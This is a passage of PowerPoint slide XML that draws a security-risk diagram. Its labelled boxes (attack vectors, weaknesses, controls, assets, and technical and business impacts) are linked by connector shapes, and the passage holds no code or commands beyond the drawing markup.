                <a:gd name="adj1" fmla="val 20889"/>
                <a:gd name="adj2" fmla="val 24667"/>
                <a:gd name="adj3" fmla="val 34667"/>
                <a:gd name="adj4" fmla="val 80130"/>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eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1354769" y="2085975"/>
              <a:ext cx="550151" cy="302327"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Vectors</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2727423" y="2085975"/>
              <a:ext cx="777777" cy="302327"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Weaknesses</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4621087" y="2085975"/>
              <a:ext cx="636713" cy="302327"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Technical</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Impacts</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5809634" y="2085975"/>
              <a:ext cx="599843" cy="302327"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" algn="ctr">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Business</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Impacts</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="3352800"/>
              <a:ext cx="838200" cy="357187"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 20889"/>
                <a:gd name="adj2" fmla="val 24667"/>
                <a:gd name="adj3" fmla="val 34667"/>
                <a:gd name="adj4" fmla="val 80130"/>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r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Attack</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="2924175"/>
              <a:ext cx="762000" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 12500"/>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r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Impact</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="3381375"/>
              <a:ext cx="762000" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 12500"/>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r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Impact</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="3486120"/>
              <a:ext cx="685800" cy="428655"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>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defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Asset</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="3076575"/>
              <a:ext cx="685800" cy="428655"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>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eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Function</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="AutoShape 85"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4648200" y="2686020"/>
              <a:ext cx="685800" cy="428655"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst>
                <a:gd name="adj" fmla="val 25000"/>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defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>Asset</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="2905125"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="66" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2640" y="2743"/>
                <a:ext cx="528" cy="288"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="67" name="AutoShape 117"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2418" y="2736"/>
                <a:ext cx="336" cy="288"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 25000"/>
                  <a:gd name="adj2" fmla="val 25000"/>
                  <a:gd name="adj3" fmla="val 19444"/>
                  <a:gd name="adj4" fmla="val 66667"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>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endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="52" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="66" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490729" cy="2116"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="800000"/>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733800" y="2476500"/>
              <a:ext cx="457200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Control</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="80" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733799" y="2914650"/>
              <a:ext cx="457200" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Control</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3733800" y="3810000"/>
              <a:ext cx="457200" cy="3810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eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>Control</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362200" y="3800475"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="85" name="Rectangle 116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2640" y="2743"/>
                <a:ext cx="528" cy="288"/>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eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent1">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="86" name="AutoShape 117"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2418" y="2736"/>
                <a:ext cx="336" cy="288"/>
              </a:xfrm>
              <a:prstGeom prst="rightArrowCallout">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 25000"/>
                  <a:gd name="adj2" fmla="val 25000"/>
                  <a:gd name="adj3" fmla="val 19444"/>
                  <a:gd name="adj4" fmla="val 66667"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>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endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="98" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="40" idx="3"/>
              <a:endCxn id="56" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2209800" y="3102769"/>
              <a:ext cx="490729" cy="440266"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="800000"/>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="102" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="3" idx="3"/>
              <a:endCxn id="79" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="2666731"/>
              <a:ext cx="228600" cy="269"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="800000"/>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="105" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="66" idx="3"/>
              <a:endCxn id="80" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3505200" y="3104885"/>
              <a:ext cx="228599" cy="265"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="800000"/>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="14" name="AutoShape 108"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="752475" y="2657475"/>
              <a:ext cx="619125" cy="2382"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="800000"/>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="20" name="AutoShape 149"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="64" idx="4"/>
              <a:endCxn id="19" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5334000" y="2657475"/>
              <a:ext cx="381000" cy="242873"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="800000"/>
              <a:headEnd type="oval" w="sm" len="sm"/>
              <a:tailEnd type="oval" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="16" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="79" idx="3"/>
              <a:endCxn id="64" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
